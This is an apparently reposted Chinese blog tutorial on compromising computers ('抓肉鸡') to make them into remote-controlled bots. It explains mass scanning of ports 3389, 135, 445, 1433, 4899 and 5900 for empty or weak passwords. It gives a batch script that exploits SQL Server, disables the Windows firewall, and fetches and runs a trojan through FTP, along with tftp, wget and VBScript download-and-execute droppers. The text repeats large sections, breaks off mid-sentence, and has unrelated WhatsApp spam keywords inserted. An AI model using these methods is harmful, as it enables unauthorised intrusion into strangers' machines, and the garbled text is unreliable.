抓肉鸡的几种方法

admin 2025-08-14 阅读:21 评论:0
一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会找点工具就OK了端口抓肉鸡的几种方法 肉鸡大家都应该清楚是什么东西吧!呵呵这点就不用说了.............慢慢学 1、3389抓鸡 现在国内网络上流传着一种克隆版的XP,安装...

一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会找点工具就OK了端口抓肉鸡的几种方法 肉鸡大家都应该清楚是什么东西吧!呵呵这点就不用说了.............慢慢学

1、3389抓鸡

现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~

这种方法只针XP系统,如果遇到2000或者2003系统就不要试了

呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。

2、扫135端口抓肉鸡

首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画

可以去黑客网站搜索135)

3、扫445端口抓肉鸡

和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)

4、1433端口批量溢出抓肉鸡

这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。要用到的工具:S扫sqlhello.exenc.exe批处理文件首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件

还要新建一个tt.txt,里面你要扫的IP段,格式为

XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,中间是空格

1433是要扫描的端口,1000是扫描线程数,dosqlhello%%i

1433xxx.xxx.xx.xx556这个里的XXX添你的IP,556是后面NC监

听的端口然后再写个批处理

@echooff

Nc-l-vv-p556>daima.txt

echousername>>daima.txt

echopassword>>daima.txt

echobin>>daima.txt(以2进制传输数据)

echogetxxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt

echobye>>daima.txt

netstopsharedaccess(关闭WINDOWS自带防火墙)

ftp-s:daima.txt

xxx.exe(也是填你木马的文件名)

deldaima.txt

注意上面的代码回车符别删掉,要不然就没法下你的马了。

几种肉鸡上传文件的方法

tftp法

先在自己某机器上建个tftp服务器,如执行tftpd32.exe,

再将文件(sample.exe)上传到别的机器中(肉鸡),

肉鸡cmd中执行:tftp-i服务器ipgetsample.exe

ftp法

肉鸡cmd中执行:

echoopenftp服务器ip>ftp.txt

echousername>>ftp.txt
echopassword>>ftp.txt
echogetsample.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txt
delftp.txt

工具法

利用wineggdrop的wget.exe

肉鸡cmd中执行:wget网站/sample.exe

利用dl.vbe法

肉鸡cmd中执行:

echowithwscript:if.arguments.count^<2then.quit:endif
>dl.vbe
echosetaso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")>>dl.vbe
echoweb.open"get",.arguments(0),0:web.send:if
web.status^>200thenquit>>dl.vbe
echo
aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile
.arguments(1),2:endwith>dl.vbe
cscriptdl.vbehttp://*。*。*。*:88/sample.exesample.exe

利用iget.vbe法

方法同4,

肉鸡cmd中执行:

echoiLocal=LCase(WScript.Arguments(1))>iget.vbe
echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>>iget.vbe
echoxPost.Open"GET",iRemote,0>>iget.vbe
echoxPost.Send()>>iget.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>iget.vbe
echosGet.Mode=3>>iget.vbe
echosGet.Type=1>>iget.vbe
echosGet.Open()>>iget.vbe
echosGet.Write(xPost.responseBody)>>iget.vbe
echosGet.SaveToFileiLocal,2>>iget.vbe
cscriptiget.vbehttp://*。*。*。*/sample.exesample.exe
利用Http网站vbe法
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>dsa.vbe
echoxPost.Open"GET","http://*.*.*.*/sample.exe",0
>>dsa.vbe
echoxPost.Send()>>dsa.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbe
echosGet.Mode=3>>dsa.vbe
echosGet.Type=1>>dsa.vbe
echosGet.Open()>>dsa.vbe
echosGet.Write(xPost.responseBody)>>dsa.vbe
echosGet.SaveToFile"sample.exe",2>>dsa.vbecscript
dsa.vbe
deldsa.vbe

3389法

可以开3389,然后登陆,进行本地的下载。该方法对服务

器上传很严格的机器特有效。(包括硬件防火墙)

先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以

去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下

马执行,爽吧!所以这里讲详细点,呵呵。还有4221端口也

可以这样溢出,只要用这些端口的溢出工具就好了,详细动画

可以去黑客网站搜索1433。

忘了说,上面的工具和批处理什么的都要放在同一个文件

夹下。

先休息一下,打这么多字累死了

继续

5、扫1433抓肉鸡之方法2

要用到的工具:端口扫描器X-scanSQL综合利用工具

上面我们说过了,1433溢出现在成功率已经不高了WhatsApp登录,所以我

们可以用另一种方法。开了1433端口的机器一般都装了SQL,

所以我们可以猜测SQL弱口令来抓1433肉鸡。

首先先用端口扫描器扫一段IP的1433端口,然后结果保存为

文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描

参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了

,其他不要勾。然后在插件设置-端口相关设置-待检测端口这

有个报告,列出了有弱口令的机器,然后打开SQL综合利用工

具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-找点工具就OK了端口抓肉鸡的几种方法 肉鸡大家都应该清楚是什么东西吧!呵呵这点就不用说了.............慢慢学

1、3389抓鸡

现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~

这种方法只针XP系统,如果遇到2000或者2003系统就不要试了

呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。

2、扫135端口抓肉鸡

首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画

可以去黑客网站搜索135)

3、扫445端口抓肉鸡

和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了WhatsApp网页版,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)

4、1433端口批量溢出抓肉鸡

这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。要用到的工具:S扫sqlhello.exenc.exe批处理文件首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件

还要新建一个tt.txt,里面你要扫的IP段,格式为

XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,中间是空格

1433是要扫描的端口,1000是扫描线程数,dosqlhello%%i

1433xxx.xxx.xx.xx556这个里的XXX添你的IP,556是后面NC监

听的端口然后再写个批处理

@echooff

Nc-l-vv-p556>daima.txt

echousername>>daima.txt

echopassword>>daima.txt

echobin>>daima.txt(以2进制传输数据)

echogetxxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt

echobye>>daima.txt

netstopsharedaccess(关闭WINDOWS自带防火墙)

ftp-s:daima.txt

xxx.exe(也是填你木马的文件名)

deldaima.txt

注意上面的代码回车符别删掉,要不然就没法下你的马了。

几种肉鸡上传文件的方法

tftp法

先在自己某机器上建个tftp服务器,如执行tftpd32.exe,

再将文件(sample.exe)上传到别的机器中(肉鸡),

肉鸡cmd中执行:tftp-i服务器ipgetsample.exe

ftp法

肉鸡cmd中执行:

echoopenftp服务器ip[端口]>ftp.txt
echousername>>ftp.txt
echopassword>>ftp.txt
echogetsample.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txt
delftp.txt

工具法

利用wineggdrop的wget.exe

肉鸡cmd中执行:wget网站/sample.exe

利用dl.vbe法

肉鸡cmd中执行:

echowithwscript:if.arguments.count^<2then.quit:endif
>dl.vbe
echosetaso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")>>dl.vbe
echoweb.open"get",.arguments(0),0:web.send:if
web.status^>200thenquit>>dl.vbe
echo
aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile
.arguments(1),2:endwith>dl.vbe
cscriptdl.vbehttp://*。*。*。*:88/sample.exesample.exe

利用iget.vbe法

方法同4,

肉鸡cmd中执行:

echoiLocal=LCase(WScript.Arguments(1))>iget.vbe
echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>>iget.vbe
echoxPost.Open"GET",iRemote,0>>iget.vbe
echoxPost.Send()>>iget.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>iget.vbe
echosGet.Mode=3>>iget.vbe
echosGet.Type=1>>iget.vbe
echosGet.Open()>>iget.vbe
echosGet.Write(xPost.responseBody)>>iget.vbe
echosGet.SaveToFileiLocal,2>>iget.vbe
cscriptiget.vbehttp://*。*。*。*/sample.exesample.exe

利用Http网站vbe法

echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>dsa.vbe
echoxPost.Open"GET","http://*.*.*.*/sample.exe",0
>>dsa.vbe
echoxPost.Send()>>dsa.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbe
echosGet.Mode=3>>dsa.vbe
echosGet.Type=1>>dsa.vbe
echosGet.Open()>>dsa.vbe
echosGet.Write(xPost.responseBody)>>dsa.vbe
echosGet.SaveToFile"sample.exe",2>>dsa.vbecscript
dsa.vbe
deldsa.vbe

3389法

可以开3389,然后登陆,进行本地的下载。该方法对服务

器上传很严格的机器特有效。(包括硬件防火墙)

先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以

去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下

马执行,爽吧!所以这里讲详细点,呵呵。还有4221端口也

可以这样溢出,只要用这些端口的溢出工具就好了,详细动画

可以去黑客网站搜索1433。

忘了说,上面的工具和批处理什么的都要放在同一个文件

夹下。

先休息一下,打这么多字累死了

继续

5、扫1433抓肉鸡之方法2

要用到的工具:端口扫描器X-scanSQL综合利用工具

上面我们说过了,1433溢出现在成功率已经不高了,所以我

们可以用另一种方法。开了1433端口的机器一般都装了SQL,

所以我们可以猜测SQL弱口令来抓1433肉鸡。

首先先用端口扫描器扫一段IP的1433端口,然后结果保存为

文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描

参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了

,其他不要勾。然后在插件设置-端口相关设置-待检测端口这

利用目录,上传你的木马,然后在用DOS命令执行你的木马就

OK了。

6、用WINNTAutoAttack扫SA弱口令抓肉鸡

其实这个原理和上面一样,效率也没上面的高,只是想让大

家知道下,呵呵。

工具:WINNTAutoAttackSQL综合利用工具

打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下

的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA

账号,接着开始扫描,扫完后,用SQL综合利用工具连上传马

执行就好了。

7、扫4899空口令抓肉鸡

工具:端口扫描器4899探测器Radmin

首先先用端口扫描器扫一段IP的4899端口,然后用4899探测

器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有

空口令的机器,带开文件管理,上传的你木马运行就OK了。

详细动画可以去黑客网站搜索4899

8、扫5900端口抓VNC肉鸡

工具:VNC扫描器VNC连接器

首先用VNC扫描器扫描一段IPWhatsApp中文版,扫描格式为vscan.exe(扫描

器文件名)-i219.0.0.0-219.255.255.255(扫描IP段)-p5900-

vnc-vv扫描完成后会在扫描器所在的同一文件夹生成一个文

本文件,打开后有一列IP,IP后面的有一些单词比如

patched,banned,vulnerable,只有单词为vulnerable才能连接。接着

就用VNC连接器连接,下面就不用多说了吧?详细动画可以去

黑客网站搜索VNC

接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费

空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介

绍几种我会的。

1、BT挂马

版权声明

本文仅代表作者观点,不代表百度立场。
本文系作者授权百度百家发表,未经许可,不得转载。

分享:

扫一扫在手机阅读、分享本文

热门文章
  • 详细指南:WhatsApp国内使用方法全攻略-下载安装、注册登录及功能使用攻略

    详细指南:WhatsApp国内使用方法全攻略-下载安装、注册登录及功能使用攻略
    一、下载与安装WhatsApp WhatsApp是一款全球使用范围极广的即时通讯软件,不仅可以实现文本聊天,还能进行语音、视频通话WhatsApp中文版,发送文件等功能。由于众所周知的原因,国内用户想要下载和安装WhatsApp可能会遇到一些困难。不过,只要按照以下步骤操作,就能顺利完成WhatsApp的下载和安装。 首先,我们需要解决的是下载问题。由于WhatsApp在国内的应用商店无法直接下载,所以我们需要寻找其他的下载途径。Android用户可以选择到各大安卓市场搜索下...
  • 苹果IOS5.1.1机完美越狱

    苹果IOS5.1.1机完美越狱
    越狱工具下载:(需手动复制: http://bbs./read-htm-tid-4804612.html ) 详细的越狱教程: Absinthe 2.0.4的越狱方法与Absinthe 1.0的越狱方法完全一样,非常简单的“傻瓜一键式”。不过这里绿毒有说明,最好重新刷固件。支持越狱设备IOS5.1.1的固件下载地址请点击本站的IOS固件下载,看下图: 下载完固件之后,把设备连接iTunes,开始刷固件。你也可以选择不刷,但是在越狱的过程之中,新的系统在越狱时会比较的顺利,...
  • 电脑微信的聊天照片文件在哪里微信图片保存电脑哪个文件夹

    电脑微信的聊天照片文件在哪里微信图片保存电脑哪个文件夹
    1. 怎么找到微信聊天图片在哪个文件夹里 图片保存路径:/storage/emulated/tencent/MicroMsg/WeiXin/文件夹,这个是完整路径。而在文件夹中只需要找到/tencent/MicroMsg/WeiXinWhatsApp中文版,就可以了,前面两个文件夹是系统根目录。以下是保存及查找图片的方法步骤介绍。 第一步、找到桌面的微信APP,直接点击打开这个微信的APP。 2. 电脑微信图片保存在哪个文件夹 个人微信文件夹。 电脑版微信聊天的图片,都保存到...
  • 小米下載WhatsApp的完整指南:安装与使用注意事项

    小米下載WhatsApp的完整指南:安装与使用注意事项
    综上所述,确保您的小米手机具备以上条件,将有助于您顺利下载和安装WhatsApp,享受便捷的通讯服务。在满足这些条件后,您就可以按照后续步骤进行WhatsApp的下载和安装。 2. 下载和安装WhatsApp的具体步骤 在小米手机上下载和安装WhatsApp的具体步骤相对简单,但需注意一些特殊情况。首先,确保你的手机系统已更新到最新版本,以保证最佳的兼容性。由于安卓手机商店内无法直接找到WhatsApp,你可以通过APKPure等第三方应用商店进行下载。打开APKPure应用...
  • Windows 11版WhatsApp将从UWP/Native切换回WebView2打包模式

    Windows 11版WhatsApp将从UWP/Native切换回WebView2打包模式
    Meta(最近更名为 Meta AI)悄然宣布,WhatsApp 将在 Windows 11 上放弃 UWP(WinUI)WhatsApp中文版,退回采用基于 Chromium 的容器。这意味着 WhatsApp 又回到了几年前的样子。由于 web.whatsapp.com 一直领先于 Windows 应用开发,它确实拥有一些新功能,但速度更慢,占用更多内存。 如果独立开发者因为无力维护所有平台的代码库而选择 Web 应用程序,那是一回事,但当像 Meta 这样价值万亿美元...